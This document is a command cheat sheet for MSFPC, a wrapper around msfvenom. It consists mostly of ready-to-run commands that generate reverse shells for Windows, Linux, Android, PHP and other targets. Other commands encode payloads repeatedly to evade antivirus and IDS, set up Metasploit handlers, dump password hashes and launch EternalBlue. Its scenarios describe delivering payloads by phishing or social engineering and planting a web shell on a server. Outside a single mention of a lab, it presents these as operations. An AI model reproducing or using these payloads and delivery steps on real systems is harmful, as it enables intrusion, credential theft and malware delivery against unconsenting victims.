MSFPC (MSFvenom Payload Creator) is a streamlined Bash wrapper around msfvenom that simplifies payload generation without memorizing complex syntax. Instead of crafting lengthy msfvenom commands, MSFPC uses simple parameters: target IP, port, and payload type.
# MSFPC comes pre-installed in Kali Linux
which msfpc
# Or install manually
git clone https://github.com/g0tmi1k/msfpc.git
cd msfpc
chmod +x msfpc.sh
sudo ln -s $(pwd)/msfpc.sh /usr/local/bin/msfpc
brew tap g0tmi1k/msfpc
brew install msfpc
git clone https://github.com/g0tmi1k/msfpc.git
cd msfpc
bash msfpc.sh <LHOST> <TYPE>
| Command | Description |
|---|
msfpc <LHOST> <TYPE> | Generate payload with default settings |
msfpc <LHOST> <TYPE> <LPORT> | Specify custom listening port |
msfpc <LHOST> <TYPE> <LPORT> <ENCODER> | Add payload encoder |
msfpc -h | Display help menu |
msfpc -v | Show version information |
| Type | Description | Staged |
|---|
windows | Windows reverse shell (auto-selects architecture) | No |
windows-staged | Windows staged payload (meterpreter) | Yes |
windows-bind | Windows bind shell (listening on target) | No |
windows/meterpreter/reverse_tcp | Full meterpreter session | Yes |
windows/shell/reverse_tcp | Simple cmd.exe shell | Yes |
windows/shell_reverse_tcp | Stageless reverse shell | No |
| Type | Description | Staged |
|---|
linux | Linux reverse shell (auto-selects architecture) | No |
linux-staged | Linux staged payload | Yes |
linux-bind | Linux bind shell | No |
linux/x86/meterpreter/reverse_tcp | 32-bit meterpreter | Yes |
linux/x64/meterpreter/reverse_tcp | 64-bit meterpreter | Yes |
linux/x86/shell/reverse_tcp | 32-bit shell | Yes |
| Type | Description |
|---|
macos | macOS reverse shell |
macos-staged | macOS staged payload |
osx/x64/shell_reverse_tcp | macOS 64-bit reverse shell |
| Type | Description | Format |
|---|
android | Android APK payload | .apk |
android-staged | Android staged meterpreter | .apk |
php | PHP reverse shell | .php |
php-staged | PHP staged payload | .php |
python | Python reverse shell | .py |
python-staged | Python staged payload | .py |
bash | Bash reverse shell | .sh |
perl | Perl reverse shell | .pl |
java | Java reverse shell | .jar |
jsp | Java Server Pages shell | .jsp |
aspx | ASP.NET reverse shell | .aspx |
# Two-part delivery: small stub downloads full payload
msfpc 192.168.1.100 windows-staged 4444
# Pros: Smaller initial payload, evasion
# Cons: Two-stage delivery required, requires handler
# Use: Firewall constraints, low bandwidth
# Full payload in one executable
msfpc 192.168.1.100 windows 4444
# Pros: Single executable, works without handler
# Cons: Larger file size, easier to detect
# Use: Direct execution, reliability required
| Encoder | Description | Effectiveness |
|---|
x86/shikata_ga_nai | Polymorphic XOR encoder | High |
x86/jmp_call_additive | JMP/CALL XOR encoder | Medium |
x64/xor | 64-bit XOR encoder | Medium |
x86/fnstenv_mov | FPU instruction encoder | Medium |
x86/countdown | Counter-based encoding | Low |
# Single encoding iteration
msfpc 192.168.1.100 windows 4444 x86/shikata_ga_nai
# Multiple iterations (harder to detect)
msfpc 192.168.1.100 windows 4444 x86/shikata_ga_nai -i 5
MSFPC automatically detects format based on payload type:
| Format | Extensions | Use Case |
|---|
| Executable | .exe, .bin | Direct execution on Windows |
| Script | .py, .pl, .sh, .php | Interpretation by runtime |
| APK | .apk | Android installation |
| JAR | .jar | Java execution |
| ASP | .aspx, .asp | Web server shells |
# Specify output filename
msfpc 192.168.1.100 windows 4444 -o payload.exe
# List available formats
msfpc -l
# Generate resource script for multi/handler
msfpc 192.168.1.100 windows 4444 -r
# Output: resource.rc (auto-generated)
# Start msfconsole with resource script
msfconsole -r resource.rc
# Or configure manually in msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
run
| Command | Description |
|---|
sessions -l | List active sessions |
sessions -i <ID> | Interact with session |
sysinfo | Get target system info |
getuid | Get current user |
hashdump | Dump SAM hashes (Windows) |
msfpc 192.168.1.10 windows-staged 8888 -r
# Generates: msfpc-output/windows-windows-meterpreter-reverse-tcp-8888.exe
# Resource file: resource.rc for multi/handler setup
msfpc 10.0.0.50 linux 5555
# Generates: linux-x86-reverse-tcp-5555
# ELF executable, ready to run
msfpc 192.168.1.100 android 9999 -r
# Generates: android-reverse-tcp-9999.apk
# Install with: adb install android-reverse-tcp-9999.apk
msfpc 192.168.1.100 php 7777
# Generates: php-reverse-tcp-7777.php
# Upload to web server and access via browser
msfpc 10.10.10.10 python 3333
# Generates: python-reverse-tcp-3333.py
# Execute: python3 python-reverse-tcp-3333.py
msfpc 192.168.1.100 windows 4444 x86/shikata_ga_nai -i 3
# Generates encoded payload with 3 iterations
# Reduces AV detection
# Generate small initial payload
msfpc 192.168.1.100 windows-staged 4444 -r
# Upload to target via phishing/web exploit
# Minimal file size, requires handler listening
# Handler setup: msfconsole -r resource.rc
# Use high port number (firewall bypass)
msfpc 192.168.1.100 windows-staged 8888 x86/shikata_ga_nai -i 5
# Encode multiple times to bypass IDS/AV
# For PHP vulnerability in web app
msfpc 192.168.1.100 php 5555
# Copy .php file to web directory
cp php-reverse-tcp-5555.php /var/www/html/shell.php
# Trigger via browser: http://target.com/shell.php
# Generate APK for target Android device
msfpc 192.168.1.100 android 6666
# Install on rooted device or via phishing
adb install android-reverse-tcp-6666.apk
# Or use social engineering to get user to install
# MSFPC creates organized output
~/msfpc-output/
├── windows-windows-meterpreter-reverse-tcp-4444.exe
├── resource.rc # Multi-handler setup
├── payload.txt # Command reference
└── handler.sh # Handler launch script
| Issue | Solution |
|---|
| Command not found | Install msfpc or add to PATH |
| msfvenom errors | Ensure Metasploit Framework is installed |
| Port already in use | Use different LPORT value |
| Staged payload won’t connect | Verify multi-handler is running |
| Antivirus detection | Use encoder option: -x86/shikata_ga_nai -i 5 |
| Architecture mismatch | Specify x86 or x64 explicitly |
# MSFPC generates payload
msfpc 192.168.1.100 windows 4444
# Use with netcat if no Metasploit available
nc -lnvp 4444
# Or socat for more control
socat TCP-LISTEN:4444,reuseaddr EXEC:bash,pty,stderr
# Generate payload
msfpc 192.168.1.100 windows-staged 8888 -r
# Use in MSFconsole exploit
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 8888
exploit
# Generate multiple payloads for different targets
for ip in 192.168.1.{50..60}; do
msfpc $ip windows-staged 4444
done
# Chain multiple encoders
msfpc 192.168.1.100 windows 4444 x86/shikata_ga_nai -i 7
# Output as different format
msfpc 192.168.1.100 windows 4444 -o shellcode.bin
# Auto-generate handler and launch
msfpc 192.168.1.100 windows-staged 4444 -r
msfconsole -r resource.rc < /dev/null &
# Payload ready for delivery
- Always set up multi-handler before sending staged payloads
- Use encoding on all payloads to evade antivirus
- Clean up generated payloads after use
- Store LHOST/LPORT securely (not in scripts)
- Use VPN/proxy for actual operations
- Test payloads in isolated lab environment first
